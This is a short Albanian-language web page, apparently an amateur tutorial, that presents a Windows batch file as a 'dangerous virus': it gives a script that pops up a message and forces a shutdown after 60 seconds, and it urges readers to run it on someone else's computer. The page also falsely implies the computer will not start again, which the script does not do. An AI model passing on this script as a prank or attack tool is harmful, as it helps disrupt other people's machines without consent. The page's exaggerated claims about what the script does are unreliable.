HTML Free Code
   
  Mire Se Vini
  Si Te Krijojm Virus Te Rrezikshem !!
 
1.Hapim Notepad
2.E Shkruajm Kete:

@echo
msg * System-Coder
shutdown -s -t 60 -c "System-Coder KHG"

3.Dhe E Ruajm SiTeDoni.bat

po menoj naj kujt ne kompjoter me ja ba jo ne te juvin se nuk qelet ma

 

 
  Byy GenTy  
 
=> Do you also want a homepage for free? Then click here! <=